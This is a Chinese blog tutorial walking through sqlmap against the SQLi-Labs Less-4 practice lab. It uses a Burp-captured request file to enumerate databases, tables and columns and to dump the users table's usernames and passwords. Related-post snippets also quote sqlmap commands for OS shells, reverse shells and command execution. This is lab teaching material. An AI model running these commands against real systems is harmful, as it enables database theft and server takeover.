SQLMAP基础使用 -r (GET或POST)

已于 2022-02-19 09:20:38 修改
阅读量3.6k 收藏 19
点赞数 1
分类专栏: SQL注入 文章标签: web安全 SQL注入
于 2022-02-18 21:13:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123010874
版权

1.访问SQLi-Labs网站

访问Less-4

http://192.168.5.116/sqli-labs/Less-4/

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

2)设置Firefox代理

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能

 4)利用Burpsuite工具拦截HTTP请求包

在Firefox地址栏中给定一个GET参数,并访问

http://192.168.5.116/sqli-labs/Less-4/?id=1

此时,Burpsuite会拦截到HTTP请求包,将请求包内容拷贝至D:\1.txt中

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

 4.寻找注入点

python sqlmap.py -r D:\1.txt

检测结果:

 5.获取所有数据库的库名

1)获取所有数据库的库名

python sqlmap.py -r D:\1.txt --dbs

 2)获取当前数据库的库名 

python sqlmap.py -r D:\1.txt --current-db

5.获取security数据库中的所有表名

python sqlmap.py -r D:\1.txt -D security --tables

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

 6.获取users表的全部字段名

python sqlmap.py -r D:\1.txt -D security -T users --columns

  7.获取users表id,username和password字段的全部值

python sqlmap.py -r D:\1.txt -D security -T users -C id,username,password --dump

Z_l123
关注
  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP的注入使用
05-13
SQLMAP的注入使用
利用sqlmap进行POST注入
热门推荐
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
SQLmap学习以及题解运用
最新发布
Z11762的博客
05-21 995
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。这里主要分为四大部分目标脱库账号与其它,sqlmap是一款自动化的sql注入工具,下面我用的是kali自带的sqlmap工具首先需要打开虚拟机终端,输入命令sqlmap,如果出现以下界面就说明工具可以使用
sqlmap -u -r参数的使用
qq_52072846的博客
03-15 1万+
SQLMAP基本使用实例 -u参数的用法: 1.爆当前数据库的库名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" 爆指定数据库中的表名 sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables
SQLmap使用总结
Alexz__的博客
02-15 3641
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
sqlmap使用详解
weixin_59246157的博客
04-21 1657
id=1" -D security -T users -C username --dump --start 1 --stop 100 #爆出数据库security中的users表中的username列中的前100条数据。
sqlmap的用法,sqlmap -r
litiammmm的博客
07-15 6533
sqlmap结合burpsuit进行sql注入漏洞查找; 配置好burpsuit和浏览器之间的代理,网上方法很多,创建一个记事本,准备写入参数使用; 1、在sqlmap根目录下创建list.txt,你也可以在其他地方创建,待会协商目录就行; 2、打开需要测试sql注入的网站,并用burpsuit进行抓包,主要关注有参数传递的链接,如下图这种: 3、符合图中Raw中的所有信息写入刚创建的txt中 4、执行sqlmap扫描命令 sqlmap -r list.txt --level..
WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场
m0_65336233的博客
10-09 1664
WEB攻防-通用漏洞&SQL注入
sqlmapproject-sqlmap-1.5.3-24-gbce3abc.zip
03-28
1. 自动化探测:SQLMap可以自动识别出各种类型的SQL注入点,包括GET、POST及其他HTTP方法的数据提交方式。 2. 深度扫描:除了基础的注入测试,SQLMap还能进行深度扫描,如盲注、时间基注入、错误注入等。 3. 数据库...
sqlmapproject-sqlmap-1.1.6-8
06-15
使用SQLMap时,务必确保遵循所有适用的法律和道德规范,只用于授权的渗透测试或自我教育,避免非法入侵他人系统。 6. 进阶技巧: SQLMap还支持自定义插件、API调用、批量扫描等功能,可以通过阅读官方文档和社区...
sqlmap中文手册-sql注入自动化测试工具
07-19
在实际使用中,如果发现Web页面的参数(如GET、POST或Cookie)可能受到SQL注入的影响,SQLMap可以快速进行验证。例如,通过对URL中的参数进行测试,如`id=1 AND 1=1`和`id=1 AND 1=2`,如果两个请求返回不同的结果,...
sqlmap-1.2.8-16-20190326.zip
03-26
SQLMap是一款广泛使用的开源自动化SQL注入工具,它旨在检测和利用SQL注入漏洞,并帮助安全研究人员或渗透测试者控制系统。在我们讨论的压缩包"sqlmap-1.2.8-16-20190326.zip"中,包含了SQLMap的特定版本——1.2.8,...
SQLMAP神器使用.pdf
01-05
- POST注入:通过BURP抓包工具捕获POST请求,保存为文件(如1.txt),然后使用`-r`参数读取文件,如`python2 sqlmap.py -r c:/1.txt`。 3. **常用命令**: - `-r`:读取POST请求数据。 - `-p`:指定注入参数。 ...
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4700
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
笔记--sqlmap的基本命令
2301_76567007的博客
06-07 448
sqlmap -u “ –smart –dbms “Mysql”–os-cmd=whoami #执行系统命令 sqlmap -u “ –smart –dbms “Mysql”–os-shell #系统交互shell。sqlmap -u “ –smart –dbms “Mysql”–os-pwn #反弹shell sqlmap -u “ –smart –dbms “Mysql”–reg-read #读取win系统注册表。
渗透利器-sqlmap超级详解
kracer的博客
11-08 4476
目录 0X01 背景介绍 0X02 原理简述 0X03 参数说明 0X04 实战举例 0X05 高级用法 0X06 总结 0X01 背景介绍 官网:http://sqlmap.org 目前支持的数据库有:Altibase,Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft...
sqlmap工具说明
tlucky的博客
03-06 1649
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
sqlmap命令详解
Pitbull2014的博客
12-20 1121
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
get和postsqlmap验证
05-30
对于SQL注入漏洞的验证,SQLmap支持通过GET和POST方法发送HTTP请求。对于GET方法,SQLmap会在URL中自动添加注入语句;对于POST方法,SQLmap会在请求体中添加注入语句。 下面是使用SQLmap进行GET和POST方法注入漏洞验证的步骤: 1. 验证GET方法注入漏洞: ``` sqlmap -u "http://example.com/test.php?id=1" --dbs ``` 其中,`-u`参数指定目标URL,`--dbs`参数用于获取数据库信息。SQLmap会自动在URL中添加注入语句进行验证。 2. 验证POST方法注入漏洞: ``` sqlmap -u "http://example.com/test.php" --data "id=1" --dbs ``` 其中,`--data`参数用于指定POST请求体中的参数,`--dbs`参数用于获取数据库信息。SQLmap会自动在请求体中添加注入语句进行验证。 注意,对于POST方法,如果请求体中有多个参数,需要使用`--data`参数指定所有参数,例如: ``` sqlmap -u "http://example.com/test.php" --data "id=1&name=test" --dbs ``` 以上是SQLmap验证GET和POST方法注入漏洞的基本步骤,具体使用方法可以参考SQLmap官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值